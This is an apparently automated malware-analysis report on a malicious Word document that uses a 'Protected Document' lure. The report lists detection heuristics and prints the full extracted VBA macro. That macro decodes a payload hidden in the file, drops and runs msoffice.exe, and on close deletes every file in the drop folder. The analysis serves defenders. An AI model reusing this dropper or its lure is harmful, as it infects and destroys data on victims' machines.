Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 39d4079b158098ec…

MALICIOUS

Office (OLE)

1.16 MB Created: 2015-03-18 01:18:00 Authoring application: Microsoft Office Word First seen: 2020-12-25
MD5: 1f3d4652082f13a8e534bb3015138f68 SHA-1: bca5accb9f1d0806f8603cf74ce0ebe9519f5004 SHA-256: 39d4079b158098ec31df14a5353e4288293d320b4a122ce509d11de64d12f51f
346 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document that uses a "Protected Document" lure to prompt the user to enable editing and content, thereby executing a VBA macro. The macro utilizes WScript.Shell and CreateObject, indicative of malicious intent. The VBA code appears to be obfuscated and truncated, but the presence of AutoOpen and AutoClose suggests it attempts to run automatically upon opening and closing the document, likely to download and execute a second-stage payload.

Heuristics 13

  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set asdvfdgdfbnghnhng = CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set FSO = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        rljosd = Environ("appdata") & "\Microsoft\Word"
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 1,219,642 bytes but its declared streams total only 613,068 bytes — 606,574 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOAD
    OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3232 bytes
SHA-256: cda54ba5e7ce040f3c142b142b81382d754385fc2cced23f9da00e58d4afacdc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Printer"
Public asdifbcs As String
Public rljosd As String
Function fcddsf4fd(sncvidir() As Byte, saapdawd As Long) As Byte
    
    For I = 0 To saapdawd - 1
        fcddsf4fd = fcddsf4fd Xor sncvidir(I)
    Next I

End Function
Function pasdnaiduads(sncvidir() As Byte, saapdawd As Long) As Boolean
    
    Dim VarByte As Byte
    VarByte = 35
    
    For I = 0 To saapdawd - 1
        sncvidir(I) = sncvidir(I) Xor VarByte
        VarByte = ((VarByte Xor 217) Xor (I Mod 256))
    Next I
    
    pasdnaiduads = True
    
End Function
Sub AutoClose()
        
    On Error Resume Next
    Kill asdifbcs
    
    On Error Resume Next
    Set FSO = CreateObject("Scripting.FileSystemObject")
    FSO.DeleteFile rljosd & "\*.*", True
    Set FSO = Nothing
        
End Sub
Sub AutoOpen()
    
    On Error GoTo poasdindvsidfbv
    
    Set asdvfdgdfbnghnhng = CreateObject("WScript.Shell")
     
    Dim rtgfggjuyjsasawefsd
    Dim sadbniasdfhsvb As Long
    Dim saapdawd As Long
    Dim edwefibvfdvcdfb As Byte
    
    sadbniasdfhsvb = FileLen(ActiveDocument.FullName)
    
    rtgfggjuyjsasawefsd = FreeFile
    Open (ActiveDocument.FullName) For Binary As #rtgfggjuyjsasawefsd
    
    Get #rtgfggjuyjsasawefsd, (sadbniasdfhsvb - 4), edwefibvfdvcdfb
    Get #rtgfggjuyjsasawefsd, (sadbniasdfhsvb - 3), saapdawd
            
    If saapdawd < 8 Then
        GoTo poasdindvsidfbv
    End If
    
    If (saapdawd + 4) > sadbniasdfhsvb Then
        GoTo poasdindvsidfbv
    End If
    
    Dim sdfsdfsvoxcvcvbcvb As Long
    sdfsdfsvoxcvcvbcvb = sadbniasdfhsvb - (saapdawd + 4)
         
    Dim sncvidir() As Byte
    ReDim sncvidir(saapdawd - 1)
    
    Get #rtgfggjuyjsasawefsd, sdfsdfsvoxcvcvbcvb, sncvidir
                 
    Close #rtgfggjuyjsasawefsd
    
    If Not pasdnaiduads(sncvidir(), saapdawd) Then
        GoTo poasdindvsidfbv
    End If
    
    Dim sdfsfdfgbnghj As Byte
    sdfsfdfgbnghj = fcddsf4fd(sncvidir(), saapdawd)
        
    If edwefibvfdvcdfb <> sdfsfdfgbnghj Then
        GoTo poasdindvsidfbv
    End If
        
    rljosd = Environ("appdata") & "\Microsoft\Word"
    
    Set FSO = CreateObject("Scripting.FileSystemObject")
    If Not FSO.FolderExists(rljosd) Then
       rljosd = Environ("appdata")
    End If
    Set FSO = Nothing
    
    Dim ergdfbfghtyjnjfgs
    ergdfbfghtyjnjfgs = FreeFile
    
    asdifbcs = rljosd & "\" & "msoffice.exe"
           
    Open (asdifbcs) For Binary As #ergdfbfghtyjnjfgs
    Put #ergdfbfghtyjnjfgs, 1, sncvidir
    Close #ergdfbfghtyjnjfgs
    
    Erase sncvidir
    
    asdvfdgdfbnghnhng.Run asdifbcs
        
    ActiveDocument.Save
    ActiveDocument.Close
    
Exit Sub

poasdindvsidfbv:

    Close #rtgfggjuyjsasawefsd
    Close #ergdfbfghtyjnjfgs
    
    ActiveDocument.Save
    ActiveDocument.Close
    
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.